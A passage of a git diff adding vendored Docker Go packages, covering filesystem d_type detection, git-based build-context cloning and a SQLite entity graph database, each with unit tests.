iteration %s", path) + } + return supportsDType, nil +} + +func iterateReadDir(path string, fn func(*syscall.Dirent) bool) error { + d, err := os.Open(path) + if err != nil { + return err + } + defer d.Close() + fd := int(d.Fd()) + buf := make([]byte, 4096) + for { + nbytes, err := syscall.ReadDirent(fd, buf) + if err != nil { + return err + } + if nbytes == 0 { + break + } + for off := 0; off < nbytes; { + ent := (*syscall.Dirent)(unsafe.Pointer(&buf[off])) + if stop := fn(ent); stop { + return nil + } + off += int(ent.Reclen) + } + } + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux_test.go b/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux_test.go new file mode 100644 index 0000000000..4a648239c0 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux_test.go @@ -0,0 +1,91 @@ +// +build linux + +package fsutils + +import ( + "io/ioutil" + "os" + "os/exec" + "syscall" + "testing" +) + +func testSupportsDType(t *testing.T, expected bool, mkfsCommand string, mkfsArg ...string) { + // check whether mkfs is installed + if _, err := exec.LookPath(mkfsCommand); err != nil { + t.Skipf("%s not installed: %v", mkfsCommand, err) + } + + // create a sparse image + imageSize := int64(32 * 1024 * 1024) + imageFile, err := ioutil.TempFile("", "fsutils-image") + if err != nil { + t.Fatal(err) + } + imageFileName := imageFile.Name() + defer os.Remove(imageFileName) + if _, err = imageFile.Seek(imageSize-1, 0); err != nil { + t.Fatal(err) + } + if _, err = imageFile.Write([]byte{0}); err != nil { + t.Fatal(err) + } + if err = imageFile.Close(); err != nil { + t.Fatal(err) + } + + // create a mountpoint + mountpoint, err := ioutil.TempDir("", "fsutils-mountpoint") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(mountpoint) + + // format the image + args := append(mkfsArg, imageFileName) + t.Logf("Executing `%s %v`", mkfsCommand, args) + out, err := exec.Command(mkfsCommand, args...).CombinedOutput() + if len(out) > 0 { + t.Log(string(out)) + } + if err != nil { + t.Fatal(err) + } + + // loopback-mount the image. + // for ease of setting up loopback device, we use os/exec rather than syscall.Mount + out, err = exec.Command("mount", "-o", "loop", imageFileName, mountpoint).CombinedOutput() + if len(out) > 0 { + t.Log(string(out)) + } + if err != nil { + t.Skip("skipping the test because mount failed") + } + defer func() { + if err := syscall.Unmount(mountpoint, 0); err != nil { + t.Fatal(err) + } + }() + + // check whether it supports d_type + result, err := SupportsDType(mountpoint) + if err != nil { + t.Fatal(err) + } + t.Logf("Supports d_type: %v", result) + if result != expected { + t.Fatalf("expected %v, got %v", expected, result) + } +} + +func TestSupportsDTypeWithFType0XFS(t *testing.T) { + testSupportsDType(t, false, "mkfs.xfs", "-m", "crc=0", "-n", "ftype=0") +} + +func TestSupportsDTypeWithFType1XFS(t *testing.T) { + testSupportsDType(t, true, "mkfs.xfs", "-m", "crc=0", "-n", "ftype=1") +} + +func TestSupportsDTypeWithExt4(t *testing.T) { + testSupportsDType(t, true, "mkfs.ext4") +} diff --git a/vendor/github.com/docker/docker/pkg/gitutils/gitutils.go b/vendor/github.com/docker/docker/pkg/gitutils/gitutils.go new file mode 100644 index 0000000000..ded091f2a2 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/gitutils/gitutils.go @@ -0,0 +1,100 @@ +package gitutils + +import ( + "fmt" + "io/ioutil" + "net/http" + "net/url" + "os" + "os/exec" + "path/filepath" + "strings" + + "github.com/docker/docker/pkg/symlink" + "github.com/docker/docker/pkg/urlutil" +) + +// Clone clones a repository into a newly created directory which +// will be under "docker-build-git" +func Clone(remoteURL string) (string, error) { + if !urlutil.IsGitTransport(remoteURL) { + remoteURL = "https://" + remoteURL + } + root, err := ioutil.TempDir("", "docker-build-git") + if err != nil { + return "", err + } + + u, err := url.Parse(remoteURL) + if err != nil { + return "", err + } + + fragment := u.Fragment + clone := cloneArgs(u, root) + + if output, err := git(clone...); err != nil { + return "", fmt.Errorf("Error trying to use git: %s (%s)", err, output) + } + + return checkoutGit(fragment, root) +} + +func cloneArgs(remoteURL *url.URL, root string) []string { + args := []string{"clone", "--recursive"} + shallow := len(remoteURL.Fragment) == 0 + + if shallow && strings.HasPrefix(remoteURL.Scheme, "http") { + res, err := http.Head(fmt.Sprintf("%s/info/refs?service=git-upload-pack", remoteURL)) + if err != nil || res.Header.Get("Content-Type") != "application/x-git-upload-pack-advertisement" { + shallow = false + } + } + + if shallow { + args = append(args, "--depth", "1") + } + + if remoteURL.Fragment != "" { + remoteURL.Fragment = "" + } + + return append(args, remoteURL.String(), root) +} + +func checkoutGit(fragment, root string) (string, error) { + refAndDir := strings.SplitN(fragment, ":", 2) + + if len(refAndDir[0]) != 0 { + if output, err := gitWithinDir(root, "checkout", refAndDir[0]); err != nil { + return "", fmt.Errorf("Error trying to use git: %s (%s)", err, output) + } + } + + if len(refAndDir) > 1 && len(refAndDir[1]) != 0 { + newCtx, err := symlink.FollowSymlinkInScope(filepath.Join(root, refAndDir[1]), root) + if err != nil { + return "", fmt.Errorf("Error setting git context, %q not within git root: %s", refAndDir[1], err) + } + + fi, err := os.Stat(newCtx) + if err != nil { + return "", err + } + if !fi.IsDir() { + return "", fmt.Errorf("Error setting git context, not a directory: %s", newCtx) + } + root = newCtx + } + + return root, nil +} + +func gitWithinDir(dir string, args ...string) ([]byte, error) { + a := []string{"--work-tree", dir, "--git-dir", filepath.Join(dir, ".git")} + return git(append(a, args...)...) +} + +func git(args ...string) ([]byte, error) { + return exec.Command("git", args...).CombinedOutput() +} diff --git a/vendor/github.com/docker/docker/pkg/gitutils/gitutils_test.go b/vendor/github.com/docker/docker/pkg/gitutils/gitutils_test.go new file mode 100644 index 0000000000..d197058d20 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/gitutils/gitutils_test.go @@ -0,0 +1,220 @@ +package gitutils + +import ( + "fmt" + "io/ioutil" + "net/http" + "net/http/httptest" + "net/url" + "os" + "path/filepath" + "reflect" + "runtime" + "strings" + "testing" +) + +func TestCloneArgsSmartHttp(t *testing.T) { + mux := http.NewServeMux() + server := httptest.NewServer(mux) + serverURL, _ := url.Parse(server.URL) + + serverURL.Path = "/repo.git" + gitURL := serverURL.String() + + mux.HandleFunc("/repo.git/info/refs", func(w http.ResponseWriter, r *http.Request) { + q := r.URL.Query().Get("service") + w.Header().Set("Content-Type", fmt.Sprintf("application/x-%s-advertisement", q)) + }) + + args := cloneArgs(serverURL, "/tmp") + exp := []string{"clone", "--recursive", "--depth", "1", gitURL, "/tmp"} + if !reflect.DeepEqual(args, exp) { + t.Fatalf("Expected %v, got %v", exp, args) + } +} + +func TestCloneArgsDumbHttp(t *testing.T) { + mux := http.NewServeMux() + server := httptest.NewServer(mux) + serverURL, _ := url.Parse(server.URL) + + serverURL.Path = "/repo.git" + gitURL := serverURL.String() + + mux.HandleFunc("/repo.git/info/refs", func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "text/plain") + }) + + args := cloneArgs(serverURL, "/tmp") + exp := []string{"clone", "--recursive", gitURL, "/tmp"} + if !reflect.DeepEqual(args, exp) { + t.Fatalf("Expected %v, got %v", exp, args) + } +} + +func TestCloneArgsGit(t *testing.T) { + u, _ := url.Parse("git://github.com/docker/docker") + args := cloneArgs(u, "/tmp") + exp := []string{"clone", "--recursive", "--depth", "1", "git://github.com/docker/docker", "/tmp"} + if !reflect.DeepEqual(args, exp) { + t.Fatalf("Expected %v, got %v", exp, args) + } +} + +func TestCloneArgsStripFragment(t *testing.T) { + u, _ := url.Parse("git://github.com/docker/docker#test") + args := cloneArgs(u, "/tmp") + exp := []string{"clone", "--recursive", "git://github.com/docker/docker", "/tmp"} + if !reflect.DeepEqual(args, exp) { + t.Fatalf("Expected %v, got %v", exp, args) + } +} + +func gitGetConfig(name string) string { + b, err := git([]string{"config", "--get", name}...) + if err != nil { + // since we are interested in empty or non empty string, + // we can safely ignore the err here. + return "" + } + return strings.TrimSpace(string(b)) +} + +func TestCheckoutGit(t *testing.T) { + root, err := ioutil.TempDir("", "docker-build-git-checkout") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(root) + + autocrlf := gitGetConfig("core.autocrlf") + if !(autocrlf == "true" || autocrlf == "false" || + autocrlf == "input" || autocrlf == "") { + t.Logf("unknown core.autocrlf value: \"%s\"", autocrlf) + } + eol := "\n" + if autocrlf == "true" { + eol = "\r\n" + } + + gitDir := filepath.Join(root, "repo") + _, err = git("init", gitDir) + if err != nil { + t.Fatal(err) + } + + if _, err = gitWithinDir(gitDir, "config", "user.email", "test@docker.com"); err != nil { + t.Fatal(err) + } + + if _, err = gitWithinDir(gitDir, "config", "user.name", "Docker test"); err != nil { + t.Fatal(err) + } + + if err = ioutil.WriteFile(filepath.Join(gitDir, "Dockerfile"), []byte("FROM scratch"), 0644); err != nil { + t.Fatal(err) + } + + subDir := filepath.Join(gitDir, "subdir") + if err = os.Mkdir(subDir, 0755); err != nil { + t.Fatal(err) + } + + if err = ioutil.WriteFile(filepath.Join(subDir, "Dockerfile"), []byte("FROM scratch\nEXPOSE 5000"), 0644); err != nil { + t.Fatal(err) + } + + if runtime.GOOS != "windows" { + if err = os.Symlink("../subdir", filepath.Join(gitDir, "parentlink")); err != nil { + t.Fatal(err) + } + + if err = os.Symlink("/subdir", filepath.Join(gitDir, "absolutelink")); err != nil { + t.Fatal(err) + } + } + + if _, err = gitWithinDir(gitDir, "add", "-A"); err != nil { + t.Fatal(err) + } + + if _, err = gitWithinDir(gitDir, "commit", "-am", "First commit"); err != nil { + t.Fatal(err) + } + + if _, err = gitWithinDir(gitDir, "checkout", "-b", "test"); err != nil { + t.Fatal(err) + } + + if err = ioutil.WriteFile(filepath.Join(gitDir, "Dockerfile"), []byte("FROM scratch\nEXPOSE 3000"), 0644); err != nil { + t.Fatal(err) + } + + if err = ioutil.WriteFile(filepath.Join(subDir, "Dockerfile"), []byte("FROM busybox\nEXPOSE 5000"), 0644); err != nil { + t.Fatal(err) + } + + if _, err = gitWithinDir(gitDir, "add", "-A"); err != nil { + t.Fatal(err) + } + + if _, err = gitWithinDir(gitDir, "commit", "-am", "Branch commit"); err != nil { + t.Fatal(err) + } + + if _, err = gitWithinDir(gitDir, "checkout", "master"); err != nil { + t.Fatal(err) + } + + type singleCase struct { + frag string + exp string + fail bool + } + + cases := []singleCase{ + {"", "FROM scratch", false}, + {"master", "FROM scratch", false}, + {":subdir", "FROM scratch" + eol + "EXPOSE 5000", false}, + {":nosubdir", "", true}, // missing directory error + {":Dockerfile", "", true}, // not a directory error + {"master:nosubdir", "", true}, + {"master:subdir", "FROM scratch" + eol + "EXPOSE 5000", false}, + {"master:../subdir", "", true}, + {"test", "FROM scratch" + eol + "EXPOSE 3000", false}, + {"test:", "FROM scratch" + eol + "EXPOSE 3000", false}, + {"test:subdir", "FROM busybox" + eol + "EXPOSE 5000", false}, + } + + if runtime.GOOS != "windows" { + // Windows GIT (2.7.1 x64) does not support parentlink/absolutelink. Sample output below + // git --work-tree .\repo --git-dir .\repo\.git add -A + // error: readlink("absolutelink"): Function not implemented + // error: unable to index file absolutelink + // fatal: adding files failed + cases = append(cases, singleCase{frag: "master:absolutelink", exp: "FROM scratch" + eol + "EXPOSE 5000", fail: false}) + cases = append(cases, singleCase{frag: "master:parentlink", exp: "FROM scratch" + eol + "EXPOSE 5000", fail: false}) + } + + for _, c := range cases { + r, err := checkoutGit(c.frag, gitDir) + + fail := err != nil + if fail != c.fail { + t.Fatalf("Expected %v failure, error was %v\n", c.fail, err) + } + if c.fail { + continue + } + + b, err := ioutil.ReadFile(filepath.Join(r, "Dockerfile")) + if err != nil { + t.Fatal(err) + } + + if string(b) != c.exp { + t.Fatalf("Expected %v, was %v\n", c.exp, string(b)) + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/graphdb/conn_sqlite3_linux.go b/vendor/github.com/docker/docker/pkg/graphdb/conn_sqlite3_linux.go new file mode 100644 index 0000000000..8e61ff3b4f --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/graphdb/conn_sqlite3_linux.go @@ -0,0 +1,19 @@ +// +build cgo + +package graphdb + +import ( + "database/sql" + + _ "github.com/mattn/go-sqlite3" // registers sqlite +) + +// NewSqliteConn opens a connection to a sqlite +// database. +func NewSqliteConn(root string) (*Database, error) { + conn, err := sql.Open("sqlite3", root) + if err != nil { + return nil, err + } + return NewDatabase(conn) +} diff --git a/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux.go b/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux.go new file mode 100644 index 0000000000..eca433fa85 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux.go @@ -0,0 +1,551 @@ +package graphdb + +import ( + "database/sql" + "fmt" + "path" + "strings" + "sync" +) + +const ( + createEntityTable = ` + CREATE TABLE IF NOT EXISTS entity ( + id text NOT NULL PRIMARY KEY + );` + + createEdgeTable = ` + CREATE TABLE IF NOT EXISTS edge ( + "entity_id" text NOT NULL, + "parent_id" text NULL, + "name" text NOT NULL, + CONSTRAINT "parent_fk" FOREIGN KEY ("parent_id") REFERENCES "entity" ("id"), + CONSTRAINT "entity_fk" FOREIGN KEY ("entity_id") REFERENCES "entity" ("id") + ); + ` + + createEdgeIndices = ` + CREATE UNIQUE INDEX IF NOT EXISTS "name_parent_ix" ON "edge" (parent_id, name); + ` +) + +// Entity with a unique id. +type Entity struct { + id string +} + +// An Edge connects two entities together. +type Edge struct { + EntityID string + Name string + ParentID string +} + +// Entities stores the list of entities. +type Entities map[string]*Entity + +// Edges stores the relationships between entities. +type Edges []*Edge + +// WalkFunc is a function invoked to process an individual entity. +type WalkFunc func(fullPath string, entity *Entity) error + +// Database is a graph database for storing entities and their relationships. +type Database struct { + conn *sql.DB + mux sync.RWMutex +} + +// IsNonUniqueNameError processes the error to check if it's caused by +// a constraint violation. +// This is necessary because the error isn't the same across various +// sqlite versions. +func IsNonUniqueNameError(err error) bool { + str := err.Error() + // sqlite 3.7.17-1ubuntu1 returns: + // Set failure: Abort due to constraint violation: columns parent_id, name are not unique + if strings.HasSuffix(str, "name are not unique") { + return true + } + // sqlite-3.8.3-1.fc20 returns: + // Set failure: Abort due to constraint violation: UNIQUE constraint failed: edge.parent_id, edge.name + if strings.Contains(str, "UNIQUE constraint failed") && strings.Contains(str, "edge.name") { + return true + } + // sqlite-3.6.20-1.el6 returns: + // Set failure: Abort due to constraint violation: constraint failed + if strings.HasSuffix(str, "constraint failed") { + return true + } + return false +} + +// NewDatabase creates a new graph database initialized with a root entity. +func NewDatabase(conn *sql.DB) (*Database, error) { + if conn == nil { + return nil, fmt.Errorf("Database connection cannot be nil") + } + db := &Database{conn: conn} + + // Create root entities + tx, err := conn.Begin() + if err != nil { + return nil, err + } + + if _, err := tx.Exec(createEntityTable); err != nil { + return nil, err + } + if _, err := tx.Exec(createEdgeTable); err != nil { + return nil, err + } + if _, err := tx.Exec(createEdgeIndices); err != nil { + return nil, err + } + + if _, err := tx.Exec("DELETE FROM entity where id = ?", "0"); err != nil { + tx.Rollback() + return nil, err + } + + if _, err := tx.Exec("INSERT INTO entity (id) VALUES (?);", "0"); err != nil { + tx.Rollback() + return nil, err + } + + if _, err := tx.Exec("DELETE FROM edge where entity_id=? and name=?", "0", "/"); err != nil { + tx.Rollback() + return nil, err + } + + if _, err := tx.Exec("INSERT INTO edge (entity_id, name) VALUES(?,?);", "0", "/"); err != nil { + tx.Rollback() + return nil, err + } + + if err := tx.Commit(); err != nil { + return nil, err + } + + return db, nil +} + +// Close the underlying connection to the database. +func (db *Database) Close() error { + return db.conn.Close() +} + +// Set the entity id for a given path. +func (db *Database) Set(fullPath, id string) (*Entity, error) { + db.mux.Lock() + defer db.mux.Unlock() + + tx, err := db.conn.Begin() + if err != nil { + return nil, err + } + + var entityID string + if err := tx.QueryRow("SELECT id FROM entity WHERE id = ?;", id).Scan(&entityID); err != nil { + if err == sql.ErrNoRows { + if _, err := tx.Exec("INSERT INTO entity (id) VALUES(?);", id); err != nil { + tx.Rollback() + return nil, err + } + } else { + tx.Rollback() + return nil, err + } + } + e := &Entity{id} + + parentPath, name := splitPath(fullPath) + if err := db.setEdge(parentPath, name, e, tx); err != nil { + tx.Rollback() + return nil, err + } + + if err := tx.Commit(); err != nil { + return nil, err + } + return e, nil +} + +// Exists returns true if a name already exists in the database. +func (db *Database) Exists(name string) bool { + db.mux.RLock() + defer db.mux.RUnlock() + + e, err := db.get(name) + if err != nil { + return false + } + return e != nil +} + +func (db *Database) setEdge(parentPath, name string, e *Entity, tx *sql.Tx) error { + parent, err := db.get(parentPath) + if err != nil { + return err + } + if parent.id == e.id { + return fmt.Errorf("Cannot set self as child") + } + + if _, err := tx.Exec("INSERT INTO edge (parent_id, name, entity_id) VALUES (?,?,?);", parent.id, name, e.id); err != nil { + return err + } + return nil +} + +// RootEntity returns the root "/" entity for the database. +func (db *Database) RootEntity() *Entity { + return &Entity{ + id: "0", + } +} + +// Get returns the entity for a given path. +func (db *Database) Get(name string) *Entity { + db.mux.RLock() + defer db.mux.RUnlock() + + e, err := db.get(name) + if err != nil { + return nil + } + return e +} + +func (db *Database) get(name string) (*Entity, error) { + e := db.RootEntity() + // We always know the root name so return it if + // it is requested + if name == "/" { + return e, nil + } + + parts := split(name) + for i := 1; i < len(parts); i++ { + p := parts[i] + if p == "" { + continue + } + + next := db.child(e, p) + if next == nil { + return nil, fmt.Errorf("Cannot find child for %s", name) + } + e = next + } + return e, nil + +} + +// List all entities by from the name. +// The key will be the full path of the entity. +func (db *Database) List(name string, depth int) Entities { + db.mux.RLock() + defer db.mux.RUnlock() + + out := Entities{} + e, err := db.get(name) + if err != nil { + return out + } + + children, err := db.children(e, name, depth, nil) + if err != nil { + return out + } + + for _, c := range children { + out[c.FullPath] = c.Entity + } + return out +} + +// Walk through the child graph of an entity, calling walkFunc for each child entity. +// It is safe for walkFunc to call graph functions. +func (db *Database) Walk(name string, walkFunc WalkFunc, depth int) error { + children, err := db.Children(name, depth) + if err != nil { + return err + } + + // Note: the database lock must not be held while calling walkFunc + for _, c := range children { + if err := walkFunc(c.FullPath, c.Entity); err != nil { + return err + } + } + return nil +} + +// Children returns the children of the specified entity. +func (db *Database) Children(name string, depth int) ([]WalkMeta, error) { + db.mux.RLock() + defer db.mux.RUnlock() + + e, err := db.get(name) + if err != nil { + return nil, err + } + + return db.children(e, name, depth, nil) +} + +// Parents returns the parents of a specified entity. +func (db *Database) Parents(name string) ([]string, error) { + db.mux.RLock() + defer db.mux.RUnlock() + + e, err := db.get(name) + if err != nil { + return nil, err + } + return db.parents(e) +} + +// Refs returns the reference count for a specified id. +func (db *Database) Refs(id string) int { + db.mux.RLock() + defer db.mux.RUnlock() + + var count int + if err := db.conn.QueryRow("SELECT COUNT(*) FROM edge WHERE entity_id = ?;", id).Scan(&count); err != nil { + return 0 + } + return count +} + +// RefPaths returns all the id's path references. +func (db *Database) RefPaths(id string) Edges { + db.mux.RLock() + defer db.mux.RUnlock() + + refs := Edges{} + + rows, err := db.conn.Query("SELECT name, parent_id FROM edge WHERE entity_id = ?;", id) + if err != nil { + return refs + } + defer rows.Close() + + for rows.Next() { + var name string + var parentID string + if err := rows.Scan(&name, &parentID); err != nil { + return refs + } + refs = append(refs, &Edge{ + EntityID: id, + Name: name, + ParentID: parentID, + }) + } + return refs +} + +// Delete the reference to an entity at a given path. +func (db *Database) Delete(name string) error { + db.mux.Lock() + defer db.mux.Unlock() + + if name == "/" { + return fmt.Errorf("Cannot delete root entity") + } + + parentPath, n := splitPath(name) + parent, err := db.get(parentPath) + if err != nil { + return err + } + + if _, err := db.conn.Exec("DELETE FROM edge WHERE parent_id = ? AND name = ?;", parent.id, n); err != nil { + return err + } + return nil +} + +// Purge removes the entity with the specified id +// Walk the graph to make sure all references to the entity +// are removed and return the number of references removed +func (db *Database) Purge(id string) (int, error) { + db.mux.Lock() + defer db.mux.Unlock() + + tx, err := db.conn.Begin() + if err != nil { + return -1, err + } + + // Delete all edges + rows, err := tx.Exec("DELETE FROM edge WHERE entity_id = ?;", id) + if err != nil { + tx.Rollback() + return -1, err + } + changes, err := rows.RowsAffected() + if err != nil { + return -1, err + } + + // Clear who's using this id as parent + refs, err := tx.Exec("DELETE FROM edge WHERE parent_id = ?;", id) + if err != nil { + tx.Rollback() + return -1, err + } + refsCount, err := refs.RowsAffected() + if err != nil { + return -1, err + } + + // Delete entity + if _, err := tx.Exec("DELETE FROM entity where id = ?;", id); err != nil { + tx.Rollback() + return -1, err + } + + if err := tx.Commit(); err != nil { + return -1, err + } + + return int(changes + refsCount), nil +} + +// Rename an edge for a given path +func (db *Database) Rename(currentName, newName string) error { + db.mux.Lock() + defer db.mux.Unlock() + + parentPath, name := splitPath(currentName) + newParentPath, newEdgeName := splitPath(newName) + + if parentPath != newParentPath { + return fmt.Errorf("Cannot rename when root paths do not match %s != %s", parentPath, newParentPath) + } + + parent, err := db.get(parentPath) + if err != nil { + return err + } + + rows, err := db.conn.Exec("UPDATE edge SET name = ? WHERE parent_id = ? AND name = ?;", newEdgeName, parent.id, name) + if err != nil { + return err + } + i, err := rows.RowsAffected() + if err != nil { + return err + } + if i == 0 { + return fmt.Errorf("Cannot locate edge for %s %s", parent.id, name) + } + return nil +} + +// WalkMeta stores the walk metadata. +type WalkMeta struct { + Parent *Entity + Entity *Entity + FullPath string + Edge *Edge +} + +func (db *Database) children(e *Entity, name string, depth int, entities []WalkMeta) ([]WalkMeta, error) { + if e == nil { + return entities, nil + } + + rows, err := db.conn.Query("SELECT entity_id, name FROM edge where parent_id = ?;", e.id) + if err != nil { + return nil, err + } + defer rows.Close() + + for rows.Next() { + var entityID, entityName string + if err := rows.Scan(&entityID, &entityName); err != nil { + return nil, err + } + child := &Entity{entityID} + edge := &Edge{ + ParentID: e.id, + Name: entityName, + EntityID: child.id, + } + + meta := WalkMeta{ + Parent: e, + Entity: child, + FullPath: path.Join(name, edge.Name), + Edge: edge, + } + + entities = append(entities, meta) + + if depth != 0 { + nDepth := depth + if depth != -1 { + nDepth-- + } + entities, err = db.children(child, meta.FullPath, nDepth, entities) + if err != nil { + return nil, err + } + } + } + + return entities, nil +} + +func (db *Database) parents(e *Entity) (parents []string, err error) { + if e == nil { + return parents, nil + } + + rows, err := db.conn.Query("SELECT parent_id FROM edge where entity_id = ?;", e.id) + if err != nil { + return nil, err + } + defer rows.Close() + + for rows.Next() { + var parentID string + if err := rows.Scan(&parentID); err != nil { + return nil, err + } + parents = append(parents, parentID) + } + + return parents, nil +} + +// Return the entity based on the parent path and name. +func (db *Database) child(parent *Entity, name string) *Entity { + var id string + if err := db.conn.QueryRow("SELECT entity_id FROM edge WHERE parent_id = ? AND name = ?;", parent.id, name).Scan(&id); err != nil { + return nil + } + return &Entity{id} +} + +// ID returns the id used to reference this entity. +func (e *Entity) ID() string { + return e.id +} + +// Paths returns the paths sorted by depth. +func (e Entities) Paths() []string { + out := make([]string, len(e)) + var i int + for k := range e { + out[i] = k + i++ + } + sortByDepth(out) + + return out +} diff --git a/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux_test.go b/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux_test.go new file mode 100644 index 0000000000..f0fb074b4d --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux_test.go @@ -0,0 +1,721 @@ +package graphdb + +import ( + "database/sql" + "fmt" + "os" + "path" + "runtime" + "strconv" + "testing" + + _ "github.com/mattn/go-sqlite3" +) + +func newTestDb(t *testing.T) (*Database, string) { + p := path.Join(os.TempDir(), "sqlite.db") + conn, err := sql.Open("sqlite3", p) + db, err := NewDatabase(conn) + if err != nil { + t.Fatal(err) + } + return db, p +} + +func destroyTestDb(dbPath string) { + os.Remove(dbPath) +} + +func TestNewDatabase(t *testing.T) { + db, dbpath := newTestDb(t) + if db == nil { + t.Fatal("Database should not be nil") + } + db.Close() + defer destroyTestDb(dbpath) +} + +func TestCreateRootEntity(t *testing.T) { + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + root := db.RootEntity() + if root == nil { + t.Fatal("Root entity should not be nil") + } +} + +func TestGetRootEntity(t *testing.T) { + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + e := db.Get("/") + if e == nil { + t.Fatal("Entity should not be nil") + } + if e.ID() != "0" { + t.Fatalf("Entity id should be 0, got %s", e.ID()) + } +} + +func TestSetEntityWithDifferentName(t *testing.T) { + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + db.Set("/test", "1") + if _, err := db.Set("/other", "1"); err != nil { + t.Fatal(err) + } +} + +func TestSetDuplicateEntity(t *testing.T) { + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + if _, err := db.Set("/foo", "42"); err != nil { + t.Fatal(err) + } + if _, err := db.Set("/foo", "43"); err == nil { + t.Fatalf("Creating an entry with a duplicate path did not cause an error") + } +} + +func TestCreateChild(t *testing.T) { + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + child, err := db.Set("/db", "1") + if err != nil { + t.Fatal(err) + } + if child == nil { + t.Fatal("Child should not be nil") + } + if child.ID() != "1" { + t.Fail() + } +} + +func TestParents(t *testing.T) { + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + for i := 1; i < 6; i++ { + a := strconv.Itoa(i) + if _, err := db.Set("/"+a, a); err != nil { + t.Fatal(err) + } + } + + for i := 6; i < 11; i++ { + a := strconv.Itoa(i) + p := strconv.Itoa(i - 5) + + key := fmt.Sprintf("/%s/%s", p, a) + + if _, err := db.Set(key, a); err != nil { + t.Fatal(err) + } + + parents, err := db.Parents(key) + if err != nil { + t.Fatal(err) + } + + if len(parents) != 1 { + t.Fatalf("Expected 1 entry for %s got %d", key, len(parents)) + } + + if parents[0] != p { + t.Fatalf("ID %s received, %s expected", parents[0], p) + } + } +} + +func TestChildren(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + str := "/" + for i := 1; i < 6; i++ { + a := strconv.Itoa(i) + if _, err := db.Set(str+a, a); err != nil { + t.Fatal(err) + } + + str = str + a + "/" + } + + str = "/" + for i := 10; i < 30; i++ { // 20 entities + a := strconv.Itoa(i) + if _, err := db.Set(str+a, a); err != nil { + t.Fatal(err) + } + + str = str + a + "/" + } + entries, err := db.Children("/", 5) + if err != nil { + t.Fatal(err) + } + + if len(entries) != 11 { + t.Fatalf("Expect 11 entries for / got %d", len(entries)) + } + + entries, err = db.Children("/", 20) + if err != nil { + t.Fatal(err) + } + + if len(entries) != 25 { + t.Fatalf("Expect 25 entries for / got %d", len(entries)) + } +} + +func TestListAllRootChildren(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + for i := 1; i < 6; i++ { + a := strconv.Itoa(i) + if _, err := db.Set("/"+a, a); err != nil { + t.Fatal(err) + } + } + entries := db.List("/", -1) + if len(entries) != 5 { + t.Fatalf("Expect 5 entries for / got %d", len(entries)) + } +} + +func TestListAllSubChildren(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + _, err := db.Set("/webapp", "1") + if err != nil { + t.Fatal(err) + } + child2, err := db.Set("/db", "2") + if err != nil { + t.Fatal(err) + } + child4, err := db.Set("/logs", "4") + if err != nil { + t.Fatal(err) + } + if _, err := db.Set("/db/logs", child4.ID()); err != nil { + t.Fatal(err) + } + + child3, err := db.Set("/sentry", "3") + if err != nil { + t.Fatal(err) + } + if _, err := db.Set("/webapp/sentry", child3.ID()); err != nil { + t.Fatal(err) + } + if _, err := db.Set("/webapp/db", child2.ID()); err != nil { + t.Fatal(err) + } + + entries := db.List("/webapp", 1) + if len(entries) != 3 { + t.Fatalf("Expect 3 entries for / got %d", len(entries)) + } + + entries = db.List("/webapp", 0) + if len(entries) != 2 { + t.Fatalf("Expect 2 entries for / got %d", len(entries)) + } +} + +func TestAddSelfAsChild(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + child, err := db.Set("/test", "1") + if err != nil { + t.Fatal(err) + } + if _, err := db.Set("/test/other", child.ID()); err == nil { + t.Fatal("Error should not be nil") + } +} + +func TestAddChildToNonExistentRoot(t *testing.T) { + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + if _, err := db.Set("/myapp", "1"); err != nil { + t.Fatal(err) + } + + if _, err := db.Set("/myapp/proxy/db", "2"); err == nil { + t.Fatal("Error should not be nil") + } +} + +func TestWalkAll(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + _, err := db.Set("/webapp", "1") + if err != nil { + t.Fatal(err) + } + child2, err := db.Set("/db", "2") + if err != nil { + t.Fatal(err) + } + child4, err := db.Set("/db/logs", "4") + if err != nil { + t.Fatal(err) + } + if _, err := db.Set("/webapp/logs", child4.ID()); err != nil { + t.Fatal(err) + } + + child3, err := db.Set("/sentry", "3") + if err != nil { + t.Fatal(err) + } + if _, err := db.Set("/webapp/sentry", child3.ID()); err != nil { + t.Fatal(err) + } + if _, err := db.Set("/webapp/db", child2.ID()); err != nil { + t.Fatal(err) + } + + child5, err := db.Set("/gograph", "5") + if err != nil { + t.Fatal(err) + } + if _, err := db.Set("/webapp/same-ref-diff-name", child5.ID()); err != nil { + t.Fatal(err) + } + + if err := db.Walk("/", 